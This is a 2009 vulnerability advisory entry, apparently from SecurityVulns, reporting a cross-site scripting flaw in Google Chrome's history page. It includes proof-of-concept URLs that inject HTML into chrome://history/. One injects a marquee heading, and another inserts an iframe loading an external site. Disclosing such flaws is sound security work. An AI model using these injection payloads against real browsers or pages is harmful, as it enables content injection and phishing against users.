cross site scripting the browser google "chrome"

2009-07-28T00:00:00
ID SECURITYVULNS:DOC:22228
Type securityvulns
Reporter Securityvulns
Modified 2009-07-28T00:00:00

Description

autor : bikolinux Vuln: cross site scripting the browser google "chrome" Download: http://www.google.com/chrome error local EMAIL MSG@BIKOLINUX.NET bikolinux@gmail.com vercion test 2.0.172.37

cross site scripting the browser google "chrome" The error is when making a request to record

path = chrome://history/ path = view-source:chrome://history/

The error is in the form

EXAMPLE chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee> chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E

-- bikolinux allowed